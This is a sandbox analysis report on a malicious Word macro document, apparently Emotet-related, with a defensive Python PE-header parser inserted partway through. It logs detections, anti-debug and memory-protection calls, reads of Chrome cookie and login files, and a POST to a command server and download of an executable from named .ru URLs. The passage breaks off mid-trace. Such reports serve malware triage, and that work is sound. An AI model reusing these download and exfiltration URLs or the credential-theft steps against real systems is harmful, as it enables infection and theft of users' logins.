Summary | ZeroBOX

0519_2457254452195.doc

Gen1 VBA_macro Socket ScreenShot DNS AntiDebug MSOffice File OS Processor Check AntiVM
Category FILE
Machine s1_win7_x6402
Started May 20, 2021, 9:48 a.m.
Completed May 20, 2021, 10:03 a.m.
Size 973.0KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: MyPc, Template: Normal.dotm, Last Saved By: MyPc, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed May 19 11:36:00 2021, Last Saved Time/Date: Wed May 19 11:36:00 2021, Number of Pages: 1, Number of Words: 3, Number of Characters: 21, Security: 0
MD5 4680281474f5c31c4161ea107032b297
SHA256 49294badb32f0de8845001dcfa55223bb4bdf916905ef3148847ab9799b4d7f1
CRC32 3FAEDCA6
ssdeep 24576:MEIjrPUaphvGvGUZ93/semhXp7AsWZXgPUw2:M/jhvGvGU93097AFZgP
Yara
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • OS_Processor_Check_Zero - OS Processor Check
  • Win32_Trojan_Gen_2_0904B0_Zero - Win32 Trojan Gen
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]
  • Microsoft_Office_File_Zero - Microsoft Office File

Time & API | Arguments | Status | Return | Repeated (each call below closes with a row giving status, return value and repeat count)

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API | Arguments | Status | Return | Repeated (each call below closes with a row giving status, return value and repeat count)

IsDebuggerPresent

0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API | Arguments | Status | Return | Repeated (each call below closes with a row giving status, return value and repeat count)

GlobalMemoryStatusEx

1 1 0
suspicious_features POST method with no referer header
suspicious_request POST http://hrowedinizoin.ru/8/forum.php
request GET http://api.ipify.org/
request POST http://hrowedinizoin.ru/8/forum.php
request GET http://traverso.ru/6jkdfijsd.exe
request GET http://api.ipify.org/?format=xml
request POST http://hrowedinizoin.ru/8/forum.php
domain hrowedinizoin.ru (description: Russian Federation domain TLD)
domain traverso.ru (description: Russian Federation domain TLD)
Time & API | Arguments | Status | Return | Repeated (each call below closes with a row giving status, return value and repeat count)

NtProtectVirtualMemory

process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a01000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ebb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ec05000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x673a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x66c91000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6e621000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6e8c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6e8c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x743c1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8024
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fa0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8024
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fa0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8024
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fb0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8024
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x507c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0214e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73861000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x736f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6eac1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72931000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x726d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74e51000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72de1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70ac1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73ef1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70aa1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76891000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x707d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74481000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x66a91000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6e4c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x745d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x707a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74131000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70781000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74111000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x743c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70761000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70721000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x673a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x66a71000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 20480
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02160000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 6928
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00920000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 6928
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00980000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 6928
region_size: 77824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00990000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75111000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75241000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74f41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x740f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73e80000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73771000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local State
domain api.ipify.org
file C:\Users\test22\AppData\Local\Temp\~$19_2457254452195.doc
Time & API | Arguments | Status | Return | Repeated (each call below closes with a row giving status, return value and repeat count)

NtCreateFile

create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000198
filepath: C:\Users\test22\AppData\Local\Temp\~$19_2457254452195.doc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$19_2457254452195.doc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
cmdline C:\Windows\System32\svchost.exe
Symantec ISB.Suspexec!gen29
Kaspersky VHO:Trojan.MSOffice.Alien.gen
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
TrendMicro HEUR_VBA.DE
McAfee-GW-Edition BehavesLike.OLE2.Downloader.db
TACHYON Suspicious/W97.NS.Gen
Ikarus Trojan-Dropper.VBA.Agent
Time & API | Arguments | Status | Return | Repeated (each call below closes with a row giving status, return value and repeat count)

GetAdaptersAddresses

flags: 0
family: 2
1 0 0
Time & API | Arguments | Status | Return | Repeated (each call below closes with a row giving status, return value and repeat count)

InternetReadFile

buffer: MZ... (binary Windows PE image; the readable parts of the captured buffer are the DOS stub text "This program cannot be run in DOS mode", the "PE" signature and the section names .text, .data, .rdata, .bss, .idata, .CRT and .tls; the remaining machine code bytes are not reproduced here)
request_handle: 0x00cc000c
1 1 0
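The InternetReadFile buffer above is the start of a Windows executable arriving over HTTP inside a Word process (the report lists a GET for http://traverso.ru/6jkdfijsd.exe among the requests, though it does not say which request this read belongs to). The following is an added example, not code from the report or the sandbox: a header sniffer that recognises a PE image from the first few hundred bytes of a response and lists its sections, so a triage script can flag "document downloaded an executable" without writing the payload to disk. The sample image it parses is constructed in the code with the same section names seen in the buffer; it is not the downloaded binary.

```python
"""Sniff an HTTP response body for a Windows PE image and list its sections.

Added example, not from the ZeroBOX report. parse_pe_header() walks the DOS
header, IMAGE_FILE_HEADER and section table; build_sample_pe() fabricates a
header-only PE32 image (constructed test data) whose section names match
the ones visible in the captured buffer.
"""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
IMAGE_FILE_MACHINE_I386 = 0x14C


def parse_pe_header(buf: bytes):
    """Return a dict describing the PE header in buf, or None if buf is not a PE."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", buf, e_lfanew + 4)
    opt_off = e_lfanew + 24
    magic = struct.unpack_from("<H", buf, opt_off)[0]  # 0x10b = PE32, 0x20b = PE32+
    sec_off = opt_off + opt_size
    sections = []
    for i in range(nsec):
        off = sec_off + 40 * i
        if off + 40 > len(buf):
            break  # a partial InternetReadFile chunk: report what is present
        name = buf[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", buf, off + 8)
        chars = struct.unpack_from("<I", buf, off + 36)[0]
        sections.append({
            "name": name,
            "virtual_address": vaddr,
            "raw_size": rawsize,
            # a section that is both writable and executable is a packer/loader tell
            "writable_executable": bool(chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE),
        })
    return {"machine": machine, "pe32_plus": magic == 0x20B, "sections": sections}


def build_sample_pe(section_names):
    """Construct a header-only PE32 image with the given sections (test data only)."""
    opt_size = 0xE0
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header right after the DOS header
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, len(section_names),
                                   0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)
    secs = b""
    for i, name in enumerate(section_names):
        # .data: INITIALIZED_DATA|READ|WRITE; everything else: CODE|EXECUTE|READ
        chars = 0xC0000040 if name == ".data" else 0x60000020
        secs += name.encode().ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", 0x1000, 0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, chars)
    return bytes(dos) + coff + bytes(opt) + secs


# Section names as they appear in the captured buffer (order taken from the dump)
SAMPLE_SECTIONS = [".text", ".data", ".rdata", ".bss", ".idata", ".CRT", ".tls"]

if __name__ == "__main__":
    info = parse_pe_header(build_sample_pe(SAMPLE_SECTIONS))
    print("PE32+" if info["pe32_plus"] else "PE32", f"machine={info['machine']:#x}")
    for s in info["sections"]:
        print(f"  {s['name']:<8} va={s['virtual_address']:#010x} rwx={s['writable_executable']}")
```

Because the parser stops cleanly at a truncated section table, it can be run on each InternetReadFile chunk as it arrives rather than only on the reassembled file.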
rule Network_DNS: Communications use DNS
rule Network_TCP_Socket: Communications over RAW Socket
rule ScreenShot: Take ScreenShot
rule DebuggerCheck__GlobalFlags: (no description)
rule DebuggerCheck__QueryInfo: (no description)
rule DebuggerHiding__Thread: (no description)
rule DebuggerHiding__Active: (no description)
rule ThreadControl__Context: (no description)
rule SEH__vectored: (no description)
rule anti_dbg: Checks if being debugged
rule disable_dep: Bypass DEP
Time & API | Arguments | Status | Return | Repeated (each call below closes with a row giving status, return value and repeat count)

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000408
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
